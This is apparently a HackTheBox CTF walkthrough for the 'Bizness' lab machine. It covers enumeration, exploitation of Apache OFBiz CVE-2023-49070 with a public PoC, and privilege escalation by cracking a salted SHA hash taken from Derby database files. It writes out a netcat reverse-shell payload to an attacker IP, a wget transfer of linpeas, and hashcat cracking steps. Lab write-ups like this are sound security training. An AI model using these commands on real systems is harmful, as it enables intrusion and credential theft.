Bizness Writeup
Intro
Welcome to the Bizness challenge from HackTheBox Walkthrough, here is the link to the room.
In this challenge we are gonna practice with some web application RCE and than hash cracking to escalate our privileges.
To interact with the machine connect via OpenVPN using the "lab" config profile.
Whenever you feel ready press "Join the Machine"
The Challenge
Before starting we can add the IP address to the hots file:
sudo nano /etc/hosts
MACHINE-IP bizness.htb
Let's do with a port scan using nmap
nmap -sV MACHINE_IP
Here is the scan report:
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 80/tcp open http syn-ack ttl 63 nginx 1.18.0 443/tcp open ssl/http syn-ack ttl 63 nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see there is a webserver, let's visit the page:
Looking around we can find "Powered by Apache OFBiz", so i searched if there are any known vulnerabilities, but we still need to find out which version is it running. I have decided to do a directory scan, maybe in other pages we can see more information about its implementation.
dirsearch -u https://bizness.htb/
I have found this /solr/control/checkLogin/, navigating to it we can see a login page and on the bottom right there is the version of Apache OFBIz which is 18.12.
Now we can better target our search and i came up to a RCE vulnerability known as CVE-2023-49070. On GitHub there is PoC that we can download:
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
Once you have cloned it navigate inside the directory and run
python3 exploit.py --url https://bizness.htb --cmd 'nc -e /bin/bash YOUR-IP PORT'
On your machine you need to have a listener enabled:
nc -lvnp PORT
And you will have the shell, now we can grab the first flag:
Firstly let's upgrade the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Than put the shell in background with CTRL+Z, write
stty raw -echo
Foreground the reverse-shell
fg
Reset the shell
reset
export SHELL=bash
export TERM=xterm-256color
Now you should have a fully interactive shell.
cat /home/ofbiz/user.txt
Privilege Escalation
It is time to escalate our privileges to root to read the last flag.
I have downloaded linpeas script file to help me:
cp /usr/share/peass/linpeas/linpeas.sh .
We need to transfer it to the target.
On your machine:
python3 -m http.server
On the target machine:
wget http://ATTACKER-IP:8000/linpeas.sh
Make the script executable
chmod +x linpeas.sh
Now run it
./linpeas.sh > report.txt
One interesting path was continously appearing: /opt/ofbiz/runtime/data/derby/
Now we can go and take a look at the database directory that linpeas had discovered
cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0
In this directory i did some tries searching for keywords like this:
grep -r -l "Password" *
Until i found this file containing what i was looking for:
strings c54d0.dat
--> currentPassword=$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I Looking at this we can understand that the hash type is SHA, d is the salt and the rest are the hashed bytes.
Before throwing it into hashcat we have to apply some changes, in fact the hash had undergone some modifications (as we can find in the files at /opt/ofbiz/framework/base/src/main/java/org/apache/ofbiz/base/crypto)
-
Substitute _ with / and - with +
-
Encode the result in hex
-
Remove the spaces
-
Add the salt :d
We can do all the above steps using CyberChef online or by creating a script, you have the choice.
Now we can create a file containing the hash:
echo "HASH:d" > hash.txt
At this point we can run hashcat
hashcat -a 0 -m 120 final_hash.txt /usr/share/wordlist/rockyou.txt
And in a short time we get the root password: monkeybizness, now we can login ad get the root flag
su root
cat /root/root.txt
Congratulations, we are now in Bizness! I hope you had fun and learned something new.
If you wanna see more write ups you can check the WriteUps Directory in this GitHub repo.
Catch you in the next CTF 😃